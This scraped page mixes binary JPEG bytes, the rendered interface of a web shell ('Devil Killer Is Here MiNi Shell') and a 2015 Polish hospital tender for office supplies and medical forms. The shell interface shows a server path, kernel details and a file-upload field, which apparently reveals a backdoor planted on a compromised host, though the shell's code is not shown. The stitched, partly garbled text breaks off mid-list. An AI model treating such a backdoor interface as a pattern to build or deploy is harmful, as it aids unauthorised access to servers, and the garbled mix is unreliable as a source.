JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150806/200600-N-2015.html

<p class="kh_header"><b>Katowice: Dostawy materiałów biurowych w tym: druki, papiery rejestrujące i pozostałe materiały</b><br>
<b>Numer ogłoszenia: 200600 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny nr 6 Śląskiego Uniwersytetu Medycznego w Katowicach Górnośląskie Centrum Zdrowia Dziecka im. Jana Pawła II , ul. Medyków 16, 40-752 Katowice, woj. śląskie, tel. (032) 207 15 32, faks (032) 2071546, 252 6303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gczd.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy materiałów biurowych w tym: druki, papiery rejestrujące i pozostałe materiały.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia są dostawy materiałów biurowych w tym: druki, papiery rejestrujące i pozostałe materiały. Przedmiot zamówienia obejmuje 4 pakiety: 
1	Materiały biurowe
2	Papiery rejestrujące
3	Sztućce, opakowania jednorazowe
4	Druki, książki medyczne, recepty z kodem kreskowym.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 22.00.00.00-0, 39.22.21.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące posiadania wiedzy i doświadczenia w zakresie objętym przedmiotem zamówienia. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania odpowiednim potencjałem technicznym. Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunek dotyczący: -sytuacji ekonomicznej i finansowej. Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie potwierdzające, że oferowany przedmiot zamówienia odpowiada wymaganiom określonym w specyfikacji asortymentowo-cenowej</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2). Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w punkcie 1. 3). W przypadku wspólnego ubiegania się o udzielenie zamówienia: a) wymóg posiadania uprawnień określonych w art. 22 ust 1 powinien spełniać ten Wykonawca, który będzie wykonywać część zamówienia objętego obowiązkiem posiadania uprawnień określonych w punkcie III.3.1. b) każdy z wykonawców ubiegających się wspólnie o zamówienie musi oddzielnie udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust 1 ustawy Pzp (składając dokumenty i oświadczenia określone przez Zamawiającego w części III.4.2)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin dostawy - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gczd.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W wersji papierowej SIWZ można uzyskać w siedzibie Zamawiającego. Cena 10 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2015 godzina 10:00, miejsce: Siedziba Zamawiającego Kancelaria pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Agrafka średnia (op=12szt)	op	1
2	Bibuła marszczona 1 op / 5 szt kolorów	op	5
3	Blok kolorowy	szt	10
4	Datownik	szt	5
5	Długopis/czerwony,zielony,niebieski /	szt	100
6	Dziurkacz   	szt	5
7	Dziurkacz duży	szt	2
8	Etykiety samoprzylepne A4 210x148,5 (op=100 arkuszy) (arkusz=2etykiety)	op	24
9	Farby plakatowe szt	3
10	Folia do laminowania A4 (op=100 szt)	op	5
11	Grzbiety do bindowania małe 8 (op=100)	op	1
12	Grzbiety do bindowania średnie 12 (op=100szt)	op	2
13	Identyfikatory	szt	150
14	Kalendarz dzienny  A4	szt	10
15	Kalendarz dzienny A5szt	15
16	Kalendarz dzienny B5 szt	10
17	Kalka ołówkowa A4 (op=100  arkuszy)	op	15
18	Kalkulator (12 miejsc po przecinku)	szt	5
19	Karteczki samoprzylepne 700x525 bl	10
20	Karteczki samoprzylepne/zakładki 150x450	bl	5
21	Karteczki samoprzylepne 75x75 żółte	bl	20
22	Kartony archiwizacyjne	szt	350
23	Klej biurowy sztyft 12g/szt	szt	60
24	Wąsy plastikowe do archiwizacji dokumentów, opakowanie 100 szt	szt	25
25	Klips biurowy 25mm (op=12szt)	op	3
26	Koperta B4 (op=250 szt) szare	op	100
27	Koperta B5 (op=500 szt) białe	op	45
28	Koperta RTG 37x45 (op=250 szt) szare	op	10
29	Koperty bąbelkowe 1op/50szt 240x275	op	1
30	Koperty C4 (op=250szt) szare	op	25
31	Koperty C4 białe	szt	30
32	Koperty C5 (op=500szt) szare	op	10
33	Koperty C5 białe	szt	100
34	Koperty C6 białe( op = 1000szt)	op	6
35	Koperty na CD 	szt	4800
36	Korektor w taśmie 5mm/8m	szt	2
37	Korytka na dokumenty A4	szt	10
38	Kreda do tablicy 1op/10szt	op	1
39	Kredki ołówkowe 1 op/12szt	op	10
40	Kredki świecowe 1 op/12szt	op	10
41	Marker  /czerwony , zielony,niebieski /	szt	10
42	Marker czarny	szt	50
43	Marker do płyt CD i DVD 	szt	15
44	Marker do tablicy suchościeralnej	szt	30
45	Marker wodoodporny	szt	60
46	Mazaki kolorowe do tablicy suchościeralnej	szt	10
47	Nożyczki biurowe z uchwytem metalowym	szt	2
48	Nożyczki biurowe 	szt	10
49	Numerator cyfrowy	szt	3
50	Ofertówka-koszulka A4 (op=100 szt)	op	65
51	Okładka twarda A4, o fakturze skóry, bez napisu, granatowa	szt	10
52	Okładka do bindowania -przód-folia A4/100	op	3
53	Okładka do bindowania -tył-kolor A4/100	op	3
54	Ołówek	szt	20
55	Papier A4 perforowany pod recepty RECUS biały bez nadruku (1 op = 1000 arkuszy/2000 szt)	op	120
56	Papier do drukarki 1+1 karton	op	5
57	Papier ksero A3 500szt. 80g/m2	ryza	120
58	Papier ksero A4 500szt. 80g/m2	ryza	3800
59	Papier ksero A5/500	ryza	410
60	Papier ksero zielony A4	ryza	35
61	Papier rolka FAX 210/30	szt	90
62	Płyta CD	szt	150
63	Płyty do nadruku CD   ( wysokiej jakości, porównywalnej z płytami Verbatim, TDK, SONY).	szt	4400
64	Płyty DVD.    Płyty wysokiej jakości do archiwizacji, danych z okresem przechowywania min. 30 lat, o dużej prędkości zapisu niemniej niż x 16, o parametrach porównywalnych z płytami Verbatim, TDK, Sony.	szt	250
65	Podkładka z klipsem   na dokumenty A3	szt	20
66	Podkładka z klipsem na dokumenty A4	szt	10
67	Rozszywacz	szt	5
68	Segregatory A4/70	szt	340
69	Skoroszyt A4 plastikowy twardy	szt	200
70	Skoroszyt A4 z zawieszką plastikowy twardy 	szt	60
71	Skoroszyt oczkowy tekturowy szt	500
72	Spinacze duże/opakowanie jedn.	op	14
73	Spinacze średnie/opakowanie jedn.	op	300
74	Szablony z cyframi samoprzylepne białe 8mm	szt	5
75	Szablony z cyframi samoprzylepne czarne 15mm	szt	5
76	Sznurek z surowca 20 m naturalnego	rol	2
77	Tablica korkowa 90/60	szt	2
78	Taśma bawełniana szer. 1cm	mb	70
79	Taśma do drukarki EPSON ERC-09B (RIBBON CARTRIDGE) czarna	szt	8
80	Taśma dwustronna (szer 50 mm)	szt	15
81	Taśma klejąca 18/30	szt	420
82	Taśma pakowa szara	szt	100
83	Teczka do podpisu z kieszonką wizytową szt	25
84	Teczka wiązana 	szt	450
85	Teczka z gumką	szt	480
86	Temperówki	szt	5
87	Tusz do pieczątek czarny	szt	90
88	Tusz do pieczątek czerwony	szt	8
89	Tusz do pieczątek niebieski 	szt	10
90	Tusz do pieczątek zielony	szt	15
91	Wąsy do skoroszytów zielone (op=25szt)	op	10
92	Wpinki do segregatora - dziurkowane (do dokumentów oprawionych bindownicą) (op=100szt)	op	3
93	Zeszyt A4 (kratka 96str.)	szt	140
94	Zeszyt A5 (kratka 96str.)	szt	100
95	Zszywacz duży (100 kartek)	szt	2
96	Zszywacz 24/6	szt	10
97	Zszywki 23/13 do 100 kartek (op=1000szt)	op	5
98	Zszywki 24/6 (opakowanie jednostkowe)	op	480.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Papiery rejestrujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier termiczny - rolka 110x30	szt	100
2	Papier Mitsubishi K-61 (110/20)	szt	60
3	Papier Sony UPP-110S (110/20) oryginał	szt	144
4	Papier Schiller AT-10 (210/140/400)	szt	50
5	Papier Schiller AT-1 (90/90/400)	szt	100
6	Papier Schiller AT-2 (210/280/240)	szt	150
7	Papier Ascard (112/25)-rolka	szt	20
8	Papier EKG PC Lifepack (108/25)	szt	20
9	Papier termiczny - rolka (57/30) (1op=10szt)	szt	200
10	Papier termiczny - rolka (28/25) (1op=10szt)	szt	480
11	Papier do programu Medtronic 9790 (110/150/200)	szt	22
12	Papier do defibrylatora HP 50/30 z nadrukiem	szt	60
13	Papier termiczny do Autorefraktometra ZEISS HUMPREY model 599-6643 -rolka: szer.57 mm x dł.  25 m.	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sztućce, opakowania jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Folia aluminiowa spożywcza o długości 10 mb, szerokość 30 cm, posiadająca atest do kontaktu z żywnością 	szt	100
2	Folia spożywcza PE  samoprzylepna,  o długości 30 mb, szerokość 30 cm	szt	12
3	Kubek jednorazowy 200ml biały, posiadający atest do kontaktu z żywnością 100szt w opakowaniu	op	10
4	Łyżki jednorazowe, białe plastikowe, posiadające atest do kontaktu z żywnością, op.100 szt. 	op	53
5	Widelce jednorazowe, białe plastikowe, posiadające atest do kontaktu z żywnością, op.100 szt. 	op	53.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.21.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Druki, książki medyczne, recepty z kodem kreskowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Książka Raportów Lekarskich
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	75
2	Książka Raportów Pielęgniarskich
format A4, ilość stron 400 (200 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	150
3 Książka Badań ZDOiRZ
Pracownia Radiologii Klasycznej
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	40
4	Książka ZDOiRZ
Pracownia Zabiegów Naczyniowych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie 	szt	10
5	Książka Badań ZDOiRZ
Pracownia USG
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	17
6	Książka Badań Zakładu ZDOiRZ
Pracownia Tomografii Komputerowej
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	10
7	Książka Badań Zakładu ZDOiRZ
Biopsje
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	2
8	Książka Badań RTG Wykonywanych w Oddziałach
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	20
9	Książka Zabiegów Gabinetu Zabiegowego Zespołu Poradni Specjalistycznych 
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	25
10	Książka Zabiegów, Badań i Konsultacji Zespołu Poradni Specjalistycznych
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	16
11	Książka Pracowni Endoskopii
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie	szt	2
12	Książka Chorych Oddziału
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	20
13 Lista Oczekujących Udzielenie Świadczenia Zdrowotnego 
format A4, ilość stron 200 (100 kartek), oprawa miękka, szycie zeszytowe płaskie szt	25
14	Książka Analityczna
